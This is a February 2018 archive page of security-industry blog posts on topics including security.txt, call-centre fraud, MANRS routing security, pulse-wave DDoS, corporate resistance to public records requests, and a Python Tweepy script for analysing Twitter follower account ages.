Monthly Archives: February 2018

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Comprehensive anti-harassment policies are even more important in light of #MeToo movement

The #MeToo movement, which was birthed in the wake of sexual abuse allegations against Hollywood mogul Harvey Weinstein, has shined a spotlight on the epidemic of sexual harassment and discrimination in the U.S. According to a nationwide survey by Stop Street Harassment, a staggering 81% of women and 43% of men have experienced some form of sexual harassment or assault in their lifetimes, with 38% of women and 13% of men reporting that they have been harassed at their workplaces.

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Because of the astounding success of #MeToo – the “Silence Breakers” were named Time magazine’s Person of the Year in 2017 – businesses are bracing for a significant uptick in sexual harassment complaints in 2018. Insurers that offer employment practices liability coverage are expecting #MeToo to result in more claims as well. Forbes reports that they are raising some organizations’ premiums and deductibles (particularly in industries where it’s common for high-paid men to supervise low-paid women), refusing to cover some companies at all, and insisting that all insured companies have updated, comprehensive anti-harassment policies and procedures in place.

In addition to legal liability and difficulty obtaining affordable insurance, sexual harassment claims can irrevocably damage an organization’s reputation and make it difficult to attract the best talent. Not to mention, doing everything you can to prevent a hostile work environment is simply the right thing to do. Every company with employees should have an anti-harassment policy in place, and it should be regularly reviewed and updated as the organization and the legal landscape evolve.

Tips for a Good Anti-Harassment Policy

While the exact details will vary from workplace to workplace, in general, an anti-harassment policy should be written in straightforward, easy-to-understand language and include the following:

  • Real-life examples of inappropriate conduct, including in-person, over the phone, and through texts and email.
  • Clearly defined potential penalties for violating the policy.
  • A clearly defined formal complaint process with multiple channels for employees to make reports.
  • A no-retaliation clause assuring employees that they will not be disciplined for complaining about harassment.

In addition to having a formal anti-harassment policy, organizations must demonstrate their commitment to a harassment-free workplace by providing their employees with regular anti-harassment training, creating a “culture of compliance” from the top down, and following up with victimized employees after a complaint has been made to inform them on the status of the investigation and ensure that they have not been retaliated against.

Continuum GRC proudly supports the values of the #MeToo movement. We feel that sexual harassment and discrimination have no place in the workplace. In support of #MeToo, we are offering organizations, free of charge, a custom anti-harassment policy software module powered by our award-winning IT Audit Machine GRC software. Click here to create your FREE Policy Machine account and get started. Your free ITAM module will automate the process and walk you through the creation of your customized anti-harassment policy, step by step. Then, ITAM will act as a centralized repository of your anti-harassment compliance information moving forward, so that you can easily review and adjust your policies and procedures as needed.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post #MeToo Prompts Employers to Review their Anti-Harassment Policies appeared first on .

Implement “security.txt” to advocate responsible vuln. disclosures

Implement

After discussing CAA record in DNS to whitelist your certificate authorities in my previous article, do you know it's a matter of time that someone finds an issue with your web-presence, website or any front-facing application? If they do, what do you expect them to do? Keep it under the wrap, or disclose it to you "responsibly"? This article is for you if you advocate the responsible disclosure; else, you have to do catch up with reality (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can either reach you via bug-bounty channels, your info@example email (not recommended), social media, or would be struggling to find a secure channel. But, what if you have a way to broadcast your "security channel" details to ease out their communication, and provide them with a well documented, managed and sought out conversation channel? Isn't that cool? Voila, so what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?." But, where would you host this page - under contact-us, security, information, about-us etc.? This is the very issue that security.txt evangelists are trying to solve - standardize the file, path and it's presence as part of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in early stages[1], but is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it very well advocates that you take security seriously, and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or a security issue with your website/ application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As the security.txt follows a standard here are some points to consider,

  • The file security.txt has to be placed in .well-known directory under your domain parent directory, i.e. example.com/.well-known/security.txt
  • It documents the following fields,
    • Comments: The file can have information in the comment section that is optional. The comments shall begin with # symbol.
    • Each separate field needs a new line to define and represent.
    • Contact: This field can be an email address, phone or a link to a page where a security researcher can contact you. This field is mandatory and MUST be available in the file. It should adhere to RFC3986[3] for the syntax of email, phone and URI (MUST be served over HTTPS). Possible examples are,
      Contact: mailto:security@example.com.
      Contact: tel:+1-201-555-0123
      Contact: https://example.com/security-contact.html
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key, but a URI to the key-file.
    • Signature: If you want to show the file integrity, you can use this directive to link to the signature of the file. Each of the signature files must be named as security.txt.sig and accessible at /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This derivative can be used to acknowledge the previous researchers, and findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then, this is the place you post.

A reference security.txt extracted from Google,

Contact: https://g.co/vulnz
Contact: mailto:security@google.com
Encryption: https://services.google.com/corporate/publickey.txt
Acknowledgement: https://bughunter.withgoogle.com/
Policy: https://g.co/vrp
Hiring: https://g.co/SecurityPrivacyEngJobs

Hope this articles gives you an idea of implementing security.txt file, and the very importance of it.

Stay safe!


  1. Early drafted posted for RFC review: https://tools.ietf.org/html/draft-foudil-securitytxt-03 ↩︎

  2. Google security.txt file: https://www.google.com/.well-known/security.txt ↩︎

  3. Uniform Resource Identifier: https://tools.ietf.org/html/rfc3986 ↩︎

Authenticating Customers & Identifying Fraudsters

By Ann-Marie Stagg, Chief Executive of the Call Centre Management Association

The world is becoming increasingly intertwined with technology, creating challenges within call centre authentication processes. As we dive into the era of machine learning, artificial intelligence, and deep learning, our authentication solutions should too. The connected world is sparking the end of KBAs – or knowledge based authentication questions, which have been identified as the most common authentication solution.

Earlier this month, during the Phone Fraud Insurance Sector Workshop held in the UK, the CCMA facilitated a questionnaire outlining current authentication tactics, information gained through the phone channel, enterprise priorities in regard to fraud, and more.

When inquiring about current authentication procedures, 100% of those surveyed currently authenticate customers via KBA, asking three or more questions.

 

However, the rise in readily available data found online or through the black market allows fraudsters to easily navigate KBA within the phone channel. Additionally, these questions negatively impact overall customer experience due to additional time spent and ease of fraudulent acceptance. According to Gartner, 10-30% of customers are not able to remember their own KBAs and are not able to successfully authenticate the first time.

The majority of respondents stated they are experiencing a fairly stable rate of customers contacting their enterprises via the phone channel, making authentication within the call centre an ongoing priority. If the caller is authenticated, respondents offered various actions to be undertaken over the phone – if spoofed and undetected, fraudsters would have equal access to the following customer information:

These shocking statistics are telling us that fraudsters are typically able to authenticate better than our legitimate customers. The exposed call centre is enabling more fraud than what most organisations anticipate, as it impacts not only the phone channel but transforms into an omnichannel problem. According to Shirley Inscoe of Aite Group, 61% of cross-channel fraud originates in the call centre.  From false claims to phishing, fraudsters attempt to maneuver around security measures in efforts to gain financially.

The online channel was identified as the top priority of fraud prevention, with the phone channel following behind in second place, and the branch channel in third. Disregarding the channel involved, the attendees identified top priorities their organisation has around fraud, entailing both visible and hidden costs.

Fraudsters are able to easily bypass KBAs and other legacy solutions by taking advantage of readily available personal identifying information found via social media or the black market. Additionally, KBAs often extend call times, offering a less than positive customer experience. Enterprises are faced with the challenge of creating a balance between preventing fraud while ensuring a positive customer experience.

According to the overall survey results, enterprises are not understanding the impact fraud is having on their phone channels. It is clear legacy authentication solutions are not implementing the level of security necessary to not only protect the call centre and the unified commerce, but provide frictionless customer experiences. If top priorities are superior customer service and prevention of fraud loss, the question then becomes – how will you solve for both?

Contact us for more information.

The post Authenticating Customers & Identifying Fraudsters appeared first on Pindrop.

Minding Your MANRS

Maintaining the resilience and stability of the global Internet requires collaborative efforts between Internet Service Providers (ISPs), government agencies, enterprises, security vendors and end users. Towards that end, The Internet Society recently published a report titled, The Internet Society 2018 Action Plan, in which it proposes several initiatives, one of which is to strengthen the global Internet routing system. In tandem with its Action Plan, The Internet Society also supports a best practice initiative that was created by members of the network operator community: the Mutually Agreed Norms for Routing Security (MANRS) initiative (formerly known as the Routing Resilience Manifesto).

The MANRS initiative is a commitment by network operators around the globe to “clean their part of the street” and improve the security of the global routing system. Some ISPs already have agreed (see list here) to adopt the MANRS practices. They are implementing at least the baseline security efforts defined by MANRS Actions:

  • Filtering – Ensure the correctness of your own announcements and of announcements from your customers to adjacent networks with prefix and AS-path granularity
  • Anti-spoofing – Enable source address validation for at least single-homed stub customer networks, your own end-users, and infrastructure
  • Coordination – Maintain globally accessible up-to-date contact information
  • Global Validation – Publish your data, so others can validate routing information on a global scale

The Internet Society provides support in the form of hosting the MANRS web site, providing email lists and the participation of Internet Society staff. “During 2018, we expect to increase the rate at which networks join MANRS, and to make significant progress towards achieving a critical mass of participating network operators and Internet Exchange Points (IXPs). Through outreach to organizations, enterprises, and industry groups, we aim to reach a tipping point where operators see MANRS compliance as a strategic business advantage.”

MANRS is on a very similar mission to what we have seen the National Cyber Security Center promote in the United Kingdom, to help make the UK Internet safer. The part that specifically relates to helping reduce distributed denial of service (DDoS) attacks is the source address anti-spoofing guidance, which relates to reducing the ability for attackers to leverage open reflectors (Domain Name Server, Network Time Protocol, etc.) on the Internet to send amplified DDoS attack streams to their targets. We have already seen a drop in the use of some reflection techniques, such as notably fewer NTP Amplification DDoS attacks, but much of that may also be attributed to that fact that several vulnerabilities in NTP were patched in mid-2016.

Most of the MANRS guidance is a set of best practices for service providers. The recommendations are good, but they fall into the same category as “IoT devices should have good password security.” That is, the MANRS guidance is desirable for any individual provider, but it’s unrealistic to think it will solve the global spoofing problem – many IoT botnets can attack without spoofing, for example. There has been decades of sensible progress to help make the Internet more secure, but there is no end in sight for DDoS, because the bad guys continue to innovate ahead of the curve (for example, by taking control of IoT devices to form zombie botnet armies). It is not as if this is the first time that anti-spoofing best practices have been recommended. The most well-known anti-spoofing guidance is BCP 38, which has been around for almost two decades. Despite BCP 38, DDoS attacks not only still exist, but have grown in scale and frequency!

It is certainly a good step in the right direction for ISPs, to reduce the possibilities of abuse of critical Internet services like DNS and NTP, but organizations that rely on the Internet for business shouldn’t think that this will be the end of DDoS attacks. We have already seen the massive rise of botnet sourced DDoS attacks—mainly comprised of IoT devices—and these MANRS activities will do little to reduce or stop those types of attacks. Real-time automated DDoS protection remains the only solution to these problems.

For more information, contact us.

Bursts, Waves and DDoS: What You Need to Know

A recent Cisco report found that 42 percent of organizations experienced “burst” distributed denial of service (DDoS) attacks in 2017. Burst attacks, otherwise known as Pulse-Wave attacks, are gaining favor among hackers because they enable perpetrators to attack multiple targets, one after each other, with short, high-volume traffic bursts, in a rapidly repeating cycle. Corero’s DDoS research suggests that a likely reason for the use of “bursting” observed in pulsed DDoS attacks, is the timesharing or multiplexing of attack botnets, probably between two or more simultaneous targets of a DDoS-for-hire booter/stresser service. The hackers make more money by harnessing the power of one large botnet to service more than one customer simultaneously. Once a botnet is up and running, they can hit one target with a burst, then switch quickly to hit another target with a burst, then alternate between the targets.

This points to the increasing sophistication of hackers, in terms of their ability to better leverage large botnets and develop mechanisms which have the ability to evade detection. With short burst attacks, hackers can ramp the attack traffic faster and increase the chances of evading legacy protection on a network. These short duration burst attacks can also deliver more calculated, non-saturating traffic volumes, rather than using traditional massive brute-force attacks. Such surgical attacks are often crafted specifically to fly under the radar of conventional DDoS protection, as they can blend in with regular traffic volumes. Similar to a sleight of hand, while the target organization focuses on the ramifications of the DDoS attack, other attacks are launched to infiltrate the network and carry out activities, such as ex-filtrating valuable data.

Burst/pulse-wave attacks are of little concern for Corero customers because the SmartWall® Threat Defense System effectively mitigates such attacks – automatically, near-instantaneously and surgically – just like it would any other multi-vector attack. Whether the bursts are saturating the links, or not, the SmartWall TDS will handle it, blocking the attack traffic during the bursts and letting through any good traffic and then immediately recovering between bursts, to allow all the good traffic as it recovers to normal levels.

The comprehensive attack visibility provided by SmartWall TDS enables these Burst/Pulse attacks to be easily identified and additional mitigation techniques employed, if they are of a size that good traffic is unduly impacted. By looking at the attack trends over longer time periods, SmartWall can be configured to automatically switch to an upstream cloud mitigation service, regardless of the short-term oscillations, while continuing to block the attack traffic in the interim. At the cloud-service level, if the traffic is routed directly back to the on-premises solution too soon, this is not an issue as SmartWall TDS will automatically re-engage local mitigation and the upstream redirect process would start over again.

With legacy solutions there is typically a significant delay before volumetric DDoS mitigation engages. If attacks "start" and "end" in a periodic way, there is increased risk that enough of the attack gets through to still cause the intended impact on the target.

In the end, organizations should not underestimate burst/pulse attacks, because the capability of these well-managed botnet-sourced DDoS attacks can be many times more damaging. Any business that relies on service continuity and integrity to serve its customers should take steps to prevent such attacks.

For more information, contact us.

The TENTH Annual Disaster Recovery Breakfast: Are You F’ing Kidding Me?

Posted under: General

What was the famous Bill Gates quote? “We always overestimate the change that will occur in the next two years and underestimate the change that will occur in the next ten.” Well, we at Securosis actually can gauge that accurately given this is the TENTH annual RSA Conference Disaster Recovery Breakfast.

I think pretty much everything has changed over the past 10 years. Except that stupid users still click on things they shouldn’t. And auditors still give you a hard time about stuff that doesn’t matter. And breaches still happen. But we aren’t fighting for budget or attention much anymore. If anything, they beat a path to your door. So there’s that. It’s definitely a “be careful what you wish for” situation. We wanted to be taken seriously. But probably not this seriously.

We at Securosis are actually more excited for the next 10 years, and having been front and center on this cloud thing we believe over the next decade the status quo of both security and operations will be fundamentally disrupted. And speaking of disruption, we’ll also be previewing our new company – DisruptOPS – at breakfast, if you are interested.

We remain grateful that so many of our friends, clients, and colleagues enjoy a couple hours away from the insanity that is the RSAC. By Thursday it’s very nice to have a place to kick back, have some quiet conversations, and grab a nice breakfast. Or don’t talk to anyone at all and embrace your introvert – we get that too.

The DRB happens only because of the support of CHEN PR, LaunchTech, CyberEdge Group, and our media partner Security Boulevard. Please make sure to say hello and thank them for helping support your recovery.

As always the breakfast will be Thursday morning (April 19) from 8-11 at Jillian’s in the Metreon. It’s an open door – come and leave as you want. We will have food, beverages, and assorted non-prescription recovery items to ease your day. Yes, the bar will be open. You know how Mike likes the hair of the dog.

Please remember what the DR Breakfast is all about. No spin, no magicians (since booth babes were outlawed) and no plastic lightsabers (much to Rich’s disappointment) – it’s just a quiet place to relax and have muddled conversations with folks you know, or maybe even go out on a limb and meet someone new. We are confident you will enjoy the DRB as much as we do.

To help us estimate numbers, please RSVP to rsvp (at) securosis (dot) com.

- Mike Rothman (0) Comments Subscribe to our daily email digest

How corporations suppress disclosure of public records about themselves

paper

Transparency advocate Gary Ruskin wanted to know how the powerful food and agrochemical industries influence public universities and their research.

His small public interest consumer health watchdog organization, US Right to Know, started investigating the connections between the industries, their allies, and taxpayer-funded universities. Public records are a crucial tool Ruskin uses frequently to uncover the details of the university interactions with agrochemical companies.

“My hunch was that: in the interactions between universities and the agrochemical industry and its front groups, there would be industry secrets and there would be news, and there would be things that consumers and citizens should know. So, I filed the FOIAs, and then more FOIAs, and in the end I was right -- more than I could have imagined,” Ruskin told Freedom of the Press Foundation.

His numerous public records requests have produced documents that have exposed relationships between universities and companies like Monsanto, but the agrochemical industry is fighting to keep these ties secret.  

These requests include three filed with the University of Florida for communications between university employees and people associated with food pesticide companies. Ruskin received some, but not all, of the documents he asked for, in his requests for communications between the university and companies like Monsanto, so he filed a lawsuit against the University of Florida alleging violation of Florida’s Sunshine Law.

A retired University of Oklahoma professor who serves on the board of directors of an organization with ties to Monsanto, Drew Kershen, has intervened in the lawsuit. He argued in his motion for summary judgment, which was later denied, that the release of the documents requested, which include internal agrochemical industry email discussions, would violate his privacy.

Kershen filed a discovery request on January 17, 2018 to interrogate Ruskin about why the Yahoo! group emails should be considered public record, and why he filed the records requests in the first place.

In his response, Ruskin objected to many of Kershen’s questions, which included “describe the type of knowledge the Requested Records were intended to perpetuate, communicate, or formalize” and “Why are you seeking the Requested Documents from the University of Florida?” Ruskin’s attorney says that under Florida law, no one needs a reason to request public documents, and the subjects of the information being requested don’t have to do anything in particular to make the records eligible for disclosure. She thinks it’s unlikely the judge will require him to answer these questions.  

Michael Morisy, cofounder of government transparency website Muckrock, which helps automate public records requests, says this line of questioning is deeply concerning when judges take it seriously. “Under most states laws, if it’s open to you it’s open to everyone and it doesn’t matter why the requester wants the documents. Basis for release isn’t what your motivation is for asking for it. It would be very unusual for requesters to be forced to explain why.”

The emails that Ruskin did receive were illuminating. In them, Kershen urges other members of a Yahoo! email list used for internal industry discussion to resist Ruskin’s lawful records requests.

“I urge resisting disclosure as much as possible because USRTK is on a strategy to acquire as may emails as possible,” Kershen wrote in emails to the Yahoo! email group for internal industry discussion that were released through Ruskin’s public records requests. “Of course, USRTK will also be combing those released emails to create a negative narrative about each of us in a vast conspiracy of a secret cabal.”

US Right to Know has investigated Kershen’s organization, Genetic Literacy Project in the past, and published about its financial ties to agricultural engineering companies including Monsanto and Syngenta. (Kershen did not respond to request by Freedom of the Press Foundation for comment.)

This isn’t the first time Ruskin’s public records requests have sparked opposition from the agrochemical industry. Documents produced through his requests formed the basis of a 2015 front page New York Times article that detailed how Monsanto enlisted academics to oppose the labeling of genetically engineered foods. In response, Kevin Folta, a University of Florida professor, sued the New York Times and journalist Eric Lipton for defamation in 2017.

Folta even filed a broad subpoena against Ruskin and two other US Right to Know employees to testify in the lawsuit and produce documents, including their communications with the Times. Ruskin says that the the request was essentially demanding the nonprofit to produce over 100,000 documents for his subpoena alone. Folta finally withdrew the order after Ruskin’s legal representation filed a motion to quash the subpoena.

Records that reveal the details of relationships between government agencies and private entities are a critical use of the federal Freedom of Information Act and state-level public records acts. Yet, as these instances exemplify, private parties are increasingly deploying a diversity of tactics to prevent the disclosure of newsworthy documents about themselves.

Powerful corporations resisting disclosure of public records is not unique to the agrochemical industry or to Florida. Multinational corporation Landis+Gyr sued a public records requester and transparency website MuckRock in 2016 after the City of Seattle released records about the city’s new smart meter power grid. The company obtained a court order for MuckRock to de-publish the documents that was ultimately overturned, and even demanded MuckRock help identify readers who may have seen the documents — a potentially massive privacy violation.

Bus manufacturing company New Flyer sued Metro last May to block the release of the details of its $500 million contract with the agency. When a journalist in Texas requested traffic projections for a toll road project built by a private company, the company sued to block the release.

Facebook has demanded that officials give it at least three days notice before responding to any public records requests involving the company. In some cases, it has even asked to cities to send it a copy of the records request before officials respond. Facebook, as well as other companies including Amazon, have also used code names to shield their identities and hide their interactions with government agencies from the public.   

Advance notice of public records requests could allow Facebook to initiate a “reverse FOIA”, in which a company tries to block the release of records about itself by bringing requesters to court. It could also allow companies to determine what stories journalists are pursuing and build a strategy to delay or halt unfavorable coverage.

Gary Ruskin worries that the opposition to his public records requests will deter future journalists or organizations from critically investigating corporate wrongdoing, especially those with less resources.

“If we win the University of Florida FOIA lawsuit, and get newsworthy documents, will any journalists write about them? Will they write, knowing that that even if they write an article that is fair and accurate [...], they may get sued for defamation?”

To Ruskin, the agrochemical industry’s resistance to US Right to Know’s investigative work only reaffirms that it has information to hide. He thinks that information about the food that we eat, and the pesticides that we consume, are in the public interest, and he won’t stop fighting to bring corporate influence of scientific institutions to light.

Filing public records requests makes government activities public — inherently an act of journalism. Attempts by corporations and industries to block the release of public records about themselves are a threat to press freedom, whether they are deployed against newspapers, veteran journalists, or citizens. The public has the right to know what government agencies are doing with their taxpayer dollars, and contractor compliance with laws can only be assured when this information is disclosed.


What Executives Will Get Out of our DevSecOps Virtual Summit

Our economy is almost entirely digitized. Modern businesses rely on software to run their day-to-day operations, and, as such, innovation must meet the demands of an ever-evolving market. However, business leaders are at a crossroads when it comes to securing their digital assets. As organizations migrate towards development practices like DevOps, the need to produce software faster becomes as much of a liability as a competitive advantage if left unchecked. If business leaders want to evolve beyond DevOps into DevSecOps, there are cultural, technological, and procedural implications that need to be considered. Get a handle on this shift and what it means for you by attending our Virtual Summit, Assembling the Pieces of the DevSecOps Puzzle, on February 28. Executives will get practical tips and advice on their role in a DevSecOps world, including:

How to Empower Your Developers to Be the Standard Bearers for DevSecOps

Change often comes from the top. In order to inspire your developers to code securely, you’ll need to make sure they feel empowered to do so. CA Veracode’s own VP of Engineering, Maria Loughlin, will speak directly from her own experiences as a development leader on what inspires developers to not only code for features and function, but for security as well. Maria will discuss how business leaders can guide their developers towards secure coding education outside the office and how aligning development goals with security can foster a culture of secure coding across the entire development community. Furthermore, she will touch upon how to bridge organizational gaps between the security and development teams to ensure that everyone is speaking the same language.

Shifting Security Tools and How It Can Save Your Bottom Line

We live in an era where security can actually be considered a competitive advantage. However, that advantage can only be fully realized when security is integrated into the software development lifecycle. CA Veracode’s 2017 State of Software Security report found that developers who scan code earlier and more often in the development process fix 48 percent more flaws. This is not by accident. Tim Jarrett, Director of Product Strategy at CA Veracode, will discuss how business leaders can provide the resources to make security invisible to their developers by integrating into developer tools like IDEs, ticketing, bug tracking and build systems. Tim will discuss how investing in security up front can maintain your speed-to-market and drastically save on remediation costs later on.

The Shifting Roles of the Security Team and What DevSecOps Means for Them

It may be time to rethink how we hire AppSec professionals. By 2019, 2 million cybersecurity jobs will be open; the openings for your cybersecurity team will be among them. Since developers are the ones producing code and creating the innovations that fuel our digital economy, shouldn’t they be included in the solution to integrate security into development? Chris Wysopal, Co-Founder and CTO of CA Veracode, will discuss what these paradigm shifts mean for security professionals and how you, as a business leader, can make sure you are implementing the right resources to manage your application security program. 

The Winter Virtual Summit 2018 is coming on February 28. Get all the Summit details here. Ready to sign up? Reserve your seat today.

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name an be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(userids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime, date, time, timedelta
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with io.open(filename, "w", encoding="utf-8") as f:
        f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
        try:
            with io.open(filename, "r", encoding="utf-8") as f:
                ret = json.load(f)
        except:
            pass
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    load_fn = None
    save_fn = None
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
    else:
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
    else:
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match = re.search(match_expression, time_string)
    if match is not None:
        first_bit = match.group(1)
        second_bit = match.group(2)
        last_bit = match.group(3)
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) / 100
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("\r")
        sys.stdout.flush()
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches))
        sys.stdout.flush()
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = (map(lambda t: t._json, users_list))
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max/num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.iteritems():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {} 
                    id_str = user["id_str"] 
                    entry[id_str] = {} 
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"] 
                    for f in fields: 
                        if f in user: 
                            entry[id_str][f] = user[f] 
                    labels[label].append(entry) 
    return labels

if __name__ == "__main__": 
    account_list = [] 
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")
        sys.exit(0)

    consumer_key=""
    consumer_secret=""
    access_token=""
    access_token_secret=""

    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print
        print("\t\tFollower age ranges")
        print("\t\t===================")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.iteritems()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.iteritems():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print("\t\tMost common friends counts")
        print("\t\t==========================")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump

realdonaldtrump_age_ranges

Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here’s the top friends_count values of those accounts:

realdonaldtrump_friends_counts

Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts. However, not in as large of a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account. And we’re not. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump, and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (and hence the tool only collected data for 4997 accounts.)

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s full list of those articles.

Wizards of Entrepreneurship – Business Security Weekly #75

This week, Michael is joined by Matt Alderman to interview Will Lin, Principal and Founding Investor at Trident Capital Security! In the Security News, Apptio raised $4.6M in Equity, Morphisec raised $12M in Series B, & Dover Microsystems raised $6M "Seed" Round! Last but not least, part two of our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode75

 

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Top 5 Ways to Get Developer Application Security Buy-In [VIDEO]

